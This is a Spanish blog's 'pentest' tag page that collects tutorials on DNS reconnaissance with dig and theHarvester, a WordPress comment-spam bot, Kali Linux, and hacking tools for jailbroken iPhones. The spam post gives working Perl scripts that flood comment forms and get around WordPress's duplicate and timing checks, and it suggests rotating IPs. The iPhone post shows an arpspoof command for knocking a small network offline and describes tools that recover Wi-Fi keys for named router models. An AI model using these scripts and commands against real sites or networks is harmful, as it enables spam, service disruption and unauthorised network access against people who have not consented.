Mostrando las entradas con la etiqueta pentest. Mostrar todas las entradas
Mostrando las entradas con la etiqueta pentest. Mostrar todas las entradas

jueves, 13 de febrero de 2014

Analizar sitios web con Linux parte 2

Seguimos con los tutoriales de pentest,estos tutoriales son de analisis o recopilación de información ya que incluso las herramientas(por lo menos la primera),se considera inofensiva.

Pero aun así nos puede dar mucha información sobre un sitio web,asi que comencemos.

Dig

La primera herramienta es dig, esta herramienta es para analisis de dns.

Una explicación sencilla sobre los dns:

Cuando entramos a un sitio web desde el navegador colocamos una url en la barra de direcciones,esta dirección es resuelta por los dns para conectarnos a dicha pagina,estos dns no son a nivel usuario ya que lo único que vemos es como nos responde el navegador.

Dig nos sirve para ver todo lo que pasa por "debajo" de una simple url,ya sea para recopilar información para una analisis o para arreglar un error si somos los propietarios de ese sitio.

Bien los registros de dns son:

A = Address (Dirección ip)

AAAA = Adress (Direccion ipv6)

NS = Name Server – (Servidor de Nombres)

MX = Mail Exchange  (Registro de Intercambio de Correo) 

SOA = Start of authority (Autoridad de la zona) 

TXT = TeXT ( Información textual)

CNAME = Canonical Name (Nombre Canónico)

PTR = Pointer(Registro inverso)

Existen mas pero veremos esos con dig,para usar dig se usa la siguiente sintaxis:

dig itimetux.com

Donde itimetux.com es la url del sitio a "analizar" por defecto solo nos muestra la ip(A),este es el dominio si queremos la información de www usamos www.sitio.algo para ver el CNAME.

dig www.itimetux.com


También tenemos mas opciones:

Las cuales son para un filtrado especial,con los registros de dns de arriba,por ejemplo vamos a usar google.com para ejemplo,ya que itimetux no tiene algunas de estas características como ipv6,vamos a ver los NS de google:
dig NS google.com

Al igual que NS podemos usar MX,AAAA,etc.


Bien, también tenemos unos parámetros que podemos usar,como por ejemplo -x,para usar reverse dns:

Por ejemplo:

dig -x 216.239.32.10
Nos muestra el PTR del NS de google.

Por defecto estas consultas las hace usando el nameserver de nuestro resolv.conf,por defecto 127.0.1.1(si no lo han cambiado),para usar otro nameserver,por ejemplo uno publico:

Enlace
Por ejemplo el de OpenDNS u otro usamos un arroba:

dig itimetux.com @208.67.222.222
Si no muestra el mismo resultado que con nuestro nameserver normal podríamos estar bajo un ataque al dns,cache poisoning.

Mas información sobre dig:

dig -h | more

TheHarvester




Esta herramienta si es mas de analisis o mejor dicho de information gathering,que seria lo mismo,esta herramienta usando google,bing y otros motores de búsqueda ademas de SHODAN hace information gathering.

Esto nos recopila,subdominios,host virtuales,emails y otras cosas que tienen que ver con el sitio que usemos:

La sintaxis mas común,o la que yo uso es:

python theHarvester.py -d sitio.algo -e dns -l numero_maximo -b buscador

 Si lo usamos en Tiempo de Tux no mostrara gran información ya que es un blog(de blogger),pero en un blog por lo menos de wordpress si nos muestra mas información,por ejemplo vamos a usar desdelinux.net:

python theHarvester.py -d desdelinux.net -e 208.67.222.222 -l 200 -b all


Mas información:

python theHarvester.py -h

Eso es todo.



Leer más...

lunes, 3 de febrero de 2014

[Shell] Spam comentarios wordpress

Seguimos hablando de pentest y aquí otra cosa que se ve mucho y que molesta,el spam,el spam son esos comentarios que no dejan nada y que son masivos.

A mi no me ha tocado mucho spam en blogger como dicen que sucede en wordpress,me han llovido anuncios,mentadas de madre,y otras ridiculeces pero bueno,es lo que pasa en la web hay todo tipo de gente hay muchas personas que comentan aportan y hay otras que,que bueno...

Pero bueno lo que sea de cada quien no se que sistema usen pero hace un tiempo pasaron mi capcha y comentaron 40 veces seguidas al mismo tiempo :O,hay que reconocer que saben lo que hacen.

En esta ocasión vamos a aprender a crear un spamer para los  comentarios de wordpress.

Esto no es para que anden spameando ya que es una tontería mas si el webmaster del sitio tiene las ip's(o simplemente wordpress nos manda la ip del comentario),es para que vean como se podría spamear y como defenderse,si quieren spamear haganlo bajo su propio riesgo yo solo les aviso de la hulla de Internet.

Bien vamos a usar Perl para este ejercicio,primero que nada instalamos lo necesario:

Abrimos una shell:
sudo cpan WWW::Mechanize
sudo cpan WWW::Mechanize::GZip
sudo cpan Data::Dumper
Bien ahora debemos por ejemplo:

Ver los imput del sitio en donde queremos "comentar",para esto podriamos usar regex y pipes Unix,pero vamos a hacerlo desde perl:

Aqui un sencillo script que ubica todos los input:

1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
use strict;
use WWW::Mechanize;
use HTML::Form;
use LWP::UserAgent;
use Data::Dumper;

my $url = "http://url";

my $mech = WWW::Mechanize->new(autocheck => 1);

$mech->get( $url ) or die("No es posible conectarse a $url");

my $ua = LWP::UserAgent->new;

my $response = $ua->($url);

my @forms = HTML::Form->parse($response);

foreach (@forms) {
    print Dumper($_);
}

Ejecutamos y vemos todos los input,en wordpress es una tontería esto ya que están a fuego:


Ahora tenemos los fields:

comment
email
author 
url 



Bien vamos a crear un script para un comentario simple:






1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env perl

use warnings;
use strict;
use WWW::Mechanize::GZip;

my $url = "http://url";

my $mech = WWW::Mechanize::GZip->new();

$mech->agent_alias("Linux Mozilla");

$mech->get($url) || die $!;

my $respuesta = $mech->submit_form(
       fields => {
       comment => "Este es un spam",
       email => 'email@gmail.com',
       author => "unknow",
       url => "direccion.com",
    }
);
print "Listo";
}

Con eso podemos comentar de manera común,ahora que convierte un comentario en spam:

El numero de envíos,así que vamos a enviar mas comentarios con un bucle:

Pero primer problema,wordpress verifica los comentarios en su base de datos,si son iguales redirigue la pagina y ya podríamos comentar.

Solución añadir un contador al comentario,con añadir un numero al principio o al final basta,esto en el mail o en el comentario.

'email@gmail.com'.$i

Otro problema,wordpress checa el tiempo en el que enviamos los mensajes,esto se solucion esperando un tiempo por ejemplo:

sleep 10;

Esperar 10 segundos en cada envió,si somos un poco ingeniosos incluso podemos usar una ip diferente para cada comentario,pero eso se los dejo de tarea.

1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#!/usr/bin/env perl

use warnings;
use strict;
use WWW::Mechanize::GZip;

my $url = "http://url";

my $mech = WWW::Mechanize::GZip->new();

$mech->agent_alias("Linux Mozilla");

$mech->get($url) || die $!;

for (1..10) {
my $respuesta = $mech->submit_form(
       fields => {
       comment => "Este es un spam".$_,
       email => 'mail'.$_.'@gmail.com',
       author => "unknow".$_,
       url => "direccion.com",
    }
);
print $respuesta->content(); # Nos muestra la respuesta del sitio.
sleep 10;
}

De esa manera podríamos spamear un sitio con comentarios,de igual forma lo podemos hacer en formularios de contacto,pero bueno.



Ahora como defenderse de esto:

1. Wordpress automáticamente no publica estos comentarios,pero de por si ya tenerlos en la bandeja es molesto así que si los publica automáticamente deben cambiar a moderar.

2. Si tienen los registros del servidor se podría hacer un filtrado de ip basado en tiempo esto lo hace wordpress automáticamente,pero no esta de mas usarlo a nivel de servidor,solo que si se usa una ip diferente podría evadirse este sistema.

3. Dejárselo a los profesionales hay filtros contra el spam(si tenemos wordpress en nuestro host),hay plugins para evitar esto,los instalamos y listo.

Pero cuidado ya que aqui esta la trampa:

Metemos un plugin pensando que nos soluciona esto,pero ese es el anzuelo de los spamers,por ejemplo Akismet,en una version(no se si ahora),mostraba nuestro full path disclosure(lo veremos en su momento) que seria un problema mas grande y que se abria logrado gracias al spam.

Bien eso es todo :D.

Un comunicado de este sitio:

Ya no voy a dejar comentar a personas anonimas,solo a las de google y personas registradas,son los que dejan mejores comentarios y si me mientan la madre(como lo han hecho últimamente) por lo menos den la cara y cuerpo,o mejor dicho el nick y el avatar :P.

Es enserio ya tengo bastante con la delincuencia de este país, uno no se siente seguro en la calle como para que en el sitio donde me distraigo un rato también fomenten la violencia,así que si quieren comentar háganlo con su cuenta,también serán moderados los comentarios.

Leer más...

viernes, 22 de marzo de 2013

Kali Linux 1.0 Descarga Pentest Distro

Como saben no hago muchas entradas de pentest o si no saben no realizo muchas entradas sobre pentest,no digamos hacking digamos pentest(penetration testing) ya que la palabra hacking y hacker es muy extraña,que si hackers,crackers,lammers,script kiddies,{black,white,red}hat,etc para mi un hacker es como el señor Richard Stallman,Larry Wall o Linus Torvalds,aunque sepamos usar estas herramientas,aunque sepamos programar,no somos mas que pentesters o script kiddies,hasta que creemos un compilador un lenguaje de programación o un núcleo no seremos hacker.

Esto tal vez es extremista pero siempre he visto que personas se hacen llamar hackers y otras personas burlarse,el hecho es que como dije hacker es el tipo de "nivel" de las personas que acabo de mencionar, también lo hago porque se crea un cliché y hasta a mi las personas que conozco me dicen hacker, :S no saben ni lo que dicen.

Bueno yo "siempre" he usado este tipo de herramientas en Blackbuntu y Pentoo,mas que nada, también Backtrack y BlackBox en esta ocacion hablamos del nuevo Kali Linux de los creadores de backtrack :D



Esta es un contribución basada en Debian no en Ubuntu como backtrack así que en teoría es hermano de Ubuntu en vez de ser hijo,pero aun así es basado en APT, viene con iceweasel en vez de Firefox un navegador basado en Firefox,y como toda distro de pentest reúne las mejores herramientas de Pentest como:

Metasploit

Hydra

Nmap

Evilgrade

Burpsuite

Aircrack-ng

Hping

Wireshark

John the Ripper

sqlbruter

sqlmap

sqlninja

ettercap

dnsniff

Scripts en Python en Perl en Ruby,Lua y bash(no recuerdo en este momento)

Eso es parte de las herramientas que traen distros como backtrack y Pentoo,pero ademas trae herramientas de hardware hacking para android y arduino como

Smali

dex2jar

android-sdk




Herramientas de computo forense anti exploits(como rkhunter)

Esta para arquitecturas:

i386

amd64

armel

armhf

Con el entorno de Gnome 3.4 shell en modo fallback y en mini ISO

También cuenta con la opción de crear un LiveISO a nuestra medida

Enlace

Algo como lo estamos asiendo por aca 


Y bueno no les digo y a descargar :D

Enlace

Tambien cuenta con una mini ISO para hacer un netinstall



No esta de mas próximamente unos tutoriales de kali linux de pentesting o de alguna de sus herramientas,como dije esto es para pentesters no para hackers.
Leer más...

lunes, 23 de abril de 2012

Como poner en español Backtrack 5

Hola que tal en esta ocasión les voy a enseñar a poner backtrack 5 version gnome, en español,esto es algo muy fácil pero puede ayudar a mas de una persona esta entrada



Como Backtrack 5 se basa en ubuntu 10.04 con Gnome,solo tenemos que hacer esto

1.Abre terminal



2.Escribe esto

apt-get install language-selector

3.Abre el porgrama con

gnome-language-selector

4.Instalas los idiomas, ya que si no los instalas solo estará el ingles





Esto tambien se puede en modo terminal con algunos apt-get

Pero les recomiendo el modo grafico



5.Elegimos el nuestro que en mi caso es español

6.Reiniciamos con

reboot

7.Listo(También lo pueden poner en otros idiomas)

Aquí un vídeo mio de como queda(pueden darse cuenta que el idioma cambio :)

Excepto las Herramientas de Pentest :\

Pero esas las abrimos con cd :D


Leer más...

domingo, 4 de marzo de 2012

Probar seguridad informática desde iOS iphone jailbreak



Esta entrada es para demostrar una serie de herramientas para hacking que existen para el iphone, claro con jailbreak,esto se usa desde nuestro movil con iOS y de una manera fácil igual que todo lo que tiene que ver con el iOS,lo hago porque varias paginas lo han hecho pero usando herramientas para android y para que nuestro iphone no se quede atrás, aquí esta entrada.
Esto de hablar de hacking y el iphone se lleva a hablar de jailbreak,que es hackear el iphone pero hoy vamos a ver como hackear con el iphone,se usan y existen una serie de herramientas que se parecen o son en versión móvil lo que usamos en backtrack o blackubuntu.

Les digo antes de empezar: que este no es un hack muy espectacular ya que aunque se acceda en modo root a nuestro iphone y usemos terminales parecidas a las de linux,tiene muchas limitaciones ya que no se puede acceder totalmente al hardware de nuestro dispositivo como lo hacemos usando backtrack o blackubuntu o alguna otra distribucion para pentesting.

Así que empecemos con nuestro conteo de herramientas para probar vulnerabilidades informáticas desde nuestro device con iOS


Instalación de herramientas de pluma de prueba

Crea una carpeta llamada 'pentest' en / var / root /.

Aquí moveras todas las aplicaciones para que tengas todas las herramientas a la mano en un solo lugar

También instala:

Pearl


Python


Ruby


Disponibles en cydia solo búscalos y instalalos



1.Mobile Teminal iOS


Igual que la terminal de OS X el simbolo de sistema de windows o la terminal de linux, aquí podremos usar comandos como dpkg,sudo,cd,ejecutar apps de consola,ponernos en modo root,etc

REPO:

www.repod00r.com
DEB


Enlace


Video



2.Aircrack-ng iOS



Al igual que en backtrack descifra la clave de las redes wi-fi,solo que como no se puede poner en modo promiscuo o modo monitor,solamente descifra la clave de la red mas cercana

Repo:

cydia.myrepspace.com/otosan/
Deb(no)solo carpeta


Video



3.Nmap iOS


Nmap ("Network Mapper") es una utilidad para la exploración de la red o la auditoría de seguridad. Muchos de los sistemas y administradores de red también les resulta útil para tareas tales como inventario de la red, la gestión de los horarios de servicio de actualización, y el anfitrión de control o tiempo de servicio. Nmap utiliza paquetes IP crudos en nuevas formas para determinar qué hosts están disponibles en la red, qué servicios (nombre de la aplicación y la versión) estos equipos ofrecen, qué sistemas operativos (y versiones del sistema operativo) que se están ejecutando, qué tipo de filtros de paquetes o cortafuegos están en uso, y docenas de otras características.


Repo:

Por defecto en cydia

4.Sniffit

Igual que nmap con las mismas funciones,pero con menos opciones y mas fácil de usar


Repo:

Por defecto en cydia

5.SET (Kit de herramientas de Ingeniería Social)

El kit de herramientas de ingeniería social (SET) fue diseñado por David Kennedy (ReL1K) e incorpora muchas características útiles de ingeniería social ataca todo en una interfaz simple. El objetivo principal de SET es para automatizar y mejorar en muchos de los ataques de ingeniería social que hay. Como pentesters, ingeniería social es a menudo una práctica que no muchas personas realizan.


Repo(no)

DEB(no)

Como instalar:

En terminal

cd /private/var/

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

cd SET



Video



6.Metasploit 3.5.1+


El Metasploit Framework es un conjunto de herramientas de pruebas de penetración, explotar la plataforma de desarrollo y herramienta de investigación. Metasploit Framework incluye cientos de exploits remotos de trabajo para una variedad de plataformas. Cargas, codificadores, y los generadores nop diapositivas se pueden mezclar y combinar con los módulos de exploits para resolver casi cualquier tarea relacionada con la explotación. El Metasploit Framework está escrito en el lenguaje Ruby secuencias de comandos y se distribuye bajo la BSD licencia . Más información sobre el Metasploit Framework se puede encontrar en el Metasploit Framework sitio.

Mas info

Repo(no)

DEB(no)

Como instalar

En terminal


Vía SSH

#MSF3

apt-get install subversion nano wget python


cd /private/var/


wget http://apt.saurik.com/cydia/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb


dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb


apt-get install rubygems


wget http://updates.metasploit.com/data/releases/framework-3.5.1.tar.bz2


tar jxpf framework-3.5.1.tar.bz2


cd msf3


./msfconsole

Visto en 

Video framework 2



7.Nikto2



Un escáner de servidor web que lleva a cabo pruebas exhaustivas en los servidores web para los artículos múltiples, incluyendo más de 6400 archivos potencialmente peligrosos / CGIs, cheques de versiones no actualizadas de más de 1000 servidores, y los problemas específicos de la versión de más de 270 servidores.


Repo(no)


DEB(no)

Cómo instalar:

Necesitamos SVN para obtener el código fuente y construirlo. ejecutar "svn co http://svn2.assembla.com/svn/Nikto_2".

Se descarga la carpeta, muevelo a pentest y luego navega a la carpeta nikto2,  la siguiente carpeta y luego ejecuta con normalidad


Read more: http://geeknizer.com/iphone-pen-testing/#ixzz1oBOMH9fQ




8.Stealth MAC

Stealth MAC es una utilidad para el establecimiento de una costumbre dirección MAC del adaptador inalámbrico en el arranque. Esto es útil para ocultar o cambiar la identidad de su iPod.

Repo(no)

DEB(no)

Como instalar

Stealth MAC está incluido en el repositorio de Telesphoreo, por lo que sólo se busca "stealth mac" en Cydia.

Para utilizar el sigilo MAC, tiene que editar el archivo / etc / stealthmac.

Cambie la línea que contiene la dirección MAC de ejemplo lo que quiera.

A continuación, ejecute "smac.sh" y usted tendrá la nueva dirección MAC en el siguiente reinicio

9.Ettercap-ng



Ettercap es una suite para man en los ataques por el centro de la LAN. Cuenta con inhalación de conexiones en directo, el filtrado de contenido sobre la marcha y muchos trucos interesantes. Es compatible con la disección activa y pasiva de muchos protocolos (incluso cifrados) e incluye muchas características para el análisis de red y host.

Read more: http://geeknizer.com/iphone-pen-testing/#ixzz1oBUbbAq4


Repo:

heworm.altervista.org / Cydia



10.dsniff

dsniff es una suite de software más conocido por arpspoof, lo que permite el ataque de utilizar los paquetes ARP especialmente diseñados para redirigir el tráfico. Para instalarlo, utilice repositorio TheWorm como se muestra en la sección de instalación de aircrack-ng. Luego, sólo tienes que seleccionar dsniff.
Un uso interesante de dsniff y arpspoof es la capacidad de realizar un DoS (Denial of Service) en una red pequeña. Para ello, abra MobileTerminal. 

Repo:

heworm.altervista.org / Cydia

Para encontrar el router vamos a hacer spoofing, pasar por debajo de Configuración> Wi-Fi y la red que está conectado. La IP del router debe estar al lado de la sección etiquetada como "Router". Para ejecutar la parodia ARP, sólo tienes que escribir esto como root en MobileTerminal:

arpspoof-i en0 <router <IP



11.Tcpdump

Tcpdump es un programa utilizado como un analizador de paquetes, y puede almacenar y descargar el tráfico de red. 

En un iPhone es útil porque se puede rastrear el tráfico de la red y lo descarga en un archivo de registro, que puede ser analizado más en un equipo real.

Repo(no)

DEB(no)

Como instalar:

Para instalarlo, sólo tiene que buscar "tcpdump" en Cydia. 

Tcpdump está en el repositorio Telesphoreo.

Para ver las diferentes opciones para ejecutar tcpdump, echa un vistazo a la página del manual en línea. 

Para ejecutar tcpdump en realidad, ejecuta en MobileTerminal.


12.whois

Algo muy basico pero muy util,lo que hace es mostrarnos información de una pagina web desde Mobilterminal

Repo(no)

DEB(no)

Como instalar:

Se encuentra por defecto en cydia solo buscala e instalala

13.iWep Pro

Una app muy popular y buena que lo que hace es mostrarnos la clave de los routers wi-fi usando diccionarios .db,se usa desde una interfaz grafica sin necesidad de entrar a terminal

Puedes obtener la contraseña de los siguientes modems las X son numeros 

WLAN XX Se encuentran en España. 
SpeedToucH XXXXXX Se encuentran España 
Router Thomson. Se encuentra en varios países. 
ThomsonXXXXXX. Router Thomson. Se encuentra en varios países. 
INFINITUMXXXXXX. 6 dígitos. Router Thomson. Que se encuentran en México. 
INFINITUMXXXX** 4 dígitos. Router Thomson. Que se encuentran en México. 
EircomXXXX XXXX. Se encuentra en Irlanda. 
Equipo Bbox-XXXXXX. Router Thomson. Que se encuentran en Francia. 
DMAX XXXXXX. Router Thomson. 
Orange-XXXXXX. Router Thomson. Varios países. 
Dlink-XXXXXX. D-Link routers. Varios países. 
Alice-XXXXXXXX. Alice routeFastweb-1-XXXXXXXX. Fastweb Routers Versión 1. 
CytaXXXXXX. Thomson router. Varios países. 
TN_private_XXXXXX. Sólo se encuentra en Suecia. 
WLANXXXXXX. Ya.com Routers. 
WiFiXXXXXX. Ya.com Routers. 
YACOMXXXXXX. Ya.com Routers. 
WLAN_XXXX. Nueva Movi tar routers. 
JAZZTEL_XXXX. Nueva Jaz tel routers. 
BTHomeHub-HHHH

Repo:

iphoneame.com/repo

DEB

Enlace


Video



14.Pirni

Pirni es un sniffer para iPhone. Es el primer analizador de tráfico de red nativo para este dispositivo. A día de hoy, Pirni no presenta todas las funcionalidades que se pueden exigir en una herramienta de análisis de tráfico, pero es la primera herramienta que permite capturar tráfico de una red en la que el dispositivo móvil se encuentre conectada.

Una de las características más interesantes es laposibilidad de construir un log con extensión .cap o .pcap. De este modo se pueden guardar las capturas de tráfico y poder estudiarlas en un Wireshark, ya sea de un PC o un Mac OS X.

Repo(no)

Deb(no)

Como instalar

Pirni se encuentra en cydia sin añadir repos solo buscala y instalala



15.hidra

Hydra es un proyecto de software desarrollado por "Opción El Hacker" (THC) que utiliza un ataque de diccionario para la prueba de contraseñas débiles o simplemente en una o en distancia que muchos hosts que ejecutan una variedad de servicios diferentes. Fue diseñado como una herramienta de prueba de concepto para demostrar la facilidad de craqueo de contraseñas mal elegidas. 

Repo:

heworm.altervista.org / Cydia

Video




Bueno pues eso es todo,por ahora,ya que existen muchisimas apps ya sea de terminal o con interfaz para poder realizar pruebas de vulnerabilidades desde nuestro iphone con iOS,espero que les aya gustado y comenten si gustan

Esta entrada le pertenece a varias paginas y webmasters los cuales se esforzaron en crear la información y presentarla,los cuales son:

http://geeknizer.com/


http://technology-flow.com


http://siriushack.blogspot.com


http://itimetux.com


Visitenlos:)





Leer más...